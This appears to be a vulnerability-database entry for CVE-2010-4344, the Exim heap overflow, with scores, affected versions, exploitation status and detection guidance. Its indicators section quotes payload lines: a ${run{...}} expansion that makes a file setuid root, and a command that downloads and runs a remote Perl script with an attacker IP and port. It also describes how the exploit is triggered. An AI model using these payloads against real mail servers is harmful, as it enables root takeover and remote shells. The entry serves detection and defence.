cbcvebase.
CVE-2010-4344
published 2010-12-14

CVE-2010-4344: Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session…

PriorityP194critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOIT
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
71.79%
99.3th percentile
Heap-based buffer overflow in the string_vformat function in string.c in Exim before 4.70 allows remote attackers to execute arbitrary code via an SMTP session that includes two MAIL commands in conjunction with a large message containing crafted headers, leading to improper rejection logging.

Affected

9 ranges
VendorProductVersion rangeFixed in
canonicalubuntu_linux
canonicalubuntu_linux
canonicalubuntu_linux
debiandebian_linux
debianexim4< exim4 4.70-1 (bookworm)exim4 4.70-1 (bookworm)
eximexim< 4.704.70
opensuseopensuse
opensuseopensuse
opensuseopensuse

Detection & IOCsextracted from sources · hover to see the quote

path/var/spool/exim4/s.c
path/var/spool/exim4/s
path/tmp/e.conf
commandspool_directory = ${run{/bin/chown root:root /var/spool/exim4/s}}${run{/bin/chmod 4755 /var/spool/exim4/s}}
commandexim -C/tmp/e.conf -q
command${run{/bin/sh -c "exec /bin/sh -c 'wget $trojan -O /tmp/c.pl;perl /tmp/c.pl $myip $myport; sleep 10000000'"}}
snort
SID 124:2:1
  • Snort SMTP preprocessor SID 124:2:1 fires on oversized SMTP header lines (>2000 bytes) characteristic of CVE-2010-4344 exploitation; no custom config required with default settings.
  • Alert on SMTP DATA headers exceeding ~2896 characters; the PoC triggers the alert with '(smtp) Attempted data header buffer overflow: 2896 chars'.
  • Exploit requires two MAIL FROM commands in a single SMTP session: first to deliver the oversized message (triggering rejection logging overflow), second to trigger expand_string execution of the injected ACL payload.
  • Look for Exim ${run{...}} expansion strings embedded inside SMTP message headers — this is the payload delivery mechanism used to execute shell commands.
  • Detect oversized SMTP DATA messages (exceeding the server's advertised SIZE limit by 256 KB) sent to trigger rejection-log heap overflow; the exploit sets msg_len = max_msg + 1024*256.
  • ·Snort SMTP preprocessor max_header_line_len must be set to 2000 bytes or less to ensure SID 124:2:1 fires; the default is 1000 bytes, but operators who have raised this value above 2000 will miss the attack.
  • ·The heap overflow is only triggered when Exim's rejection header logging is active (the default). Deployments that have disabled rejection logging in exim.conf will not be exploitable via this specific vector.
  • ·The Metasploit module targets Exim versions matching /Exim 4\.6\d+/ in the banner; it will abort with a warning for other version strings unless SkipVersionCheck is set, meaning detection based solely on banner version may miss patched or differently versioned installs.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.09.3CRITICALAV:N/AC:M/Au:N/C:C/I:C/A:C
osv9.8CRITICAL
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.